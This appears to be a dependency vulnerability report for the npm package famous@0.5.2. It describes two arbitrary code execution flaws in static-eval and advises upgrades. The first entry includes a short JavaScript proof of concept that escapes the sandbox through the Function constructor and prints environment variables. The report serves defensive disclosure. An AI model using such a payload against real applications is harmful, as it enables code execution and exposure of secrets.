Vulnerabilities

2 via 4 paths

Dependencies

69

Source

npm

Find, fix and prevent vulnerabilities in your code.

Severity
  • 2
Status
  • 2
  • 0
  • 0

high severity

Arbitrary Code Execution

  • Vulnerable module: static-eval
  • Introduced through: glslify@1.6.1

Detailed paths

  • Introduced through: famous@0.5.2 glslify@1.6.1 sleuth@0.1.1 static-eval@0.1.1
  • Introduced through: famous@0.5.2 glslify@1.6.1 static-eval@0.2.4
    Remediation: Upgrade to famous@0.6.0.

Overview

static-eval evaluates statically-analyzable expressions.

Affected versions of this package are vulnerable to Arbitrary Code Execution. It passes untrusted user input directly to the global function constructor, resulting in an arbitrary code execution vulnerability when user input is parsed via the package.

Proof of concept

var evaluate = require('static-eval');
var parse = require('esprima').parse;

var src = process.argv[2];
var payload = '(function({x}){return x.constructor})({x:"".sub})("console.log(process.env)")()'
var ast = parse(payload).body[0].expression;
console.log(evaluate(ast, {x:1}));

Remediation

Upgrade static-eval to version 2.0.2 or higher.

References

high severity

Arbitrary Code Execution

  • Vulnerable module: static-eval
  • Introduced through: glslify@1.6.1

Detailed paths

  • Introduced through: famous@0.5.2 glslify@1.6.1 sleuth@0.1.1 static-eval@0.1.1
  • Introduced through: famous@0.5.2 glslify@1.6.1 static-eval@0.2.4
    Remediation: Upgrade to famous@0.6.0.

Overview

static-eval is a module to evaluate statically-analyzable expressions.

Affected versions of the package are vulnerable to Arbitrary Code Execution. If un-sanitized user input is passed to static-eval, it is possible to break out of the sandboxed instance, and execute arbitrary code from the standard library.

Remediation

Upgrade static-eval to version 2.0.0 or higher.

References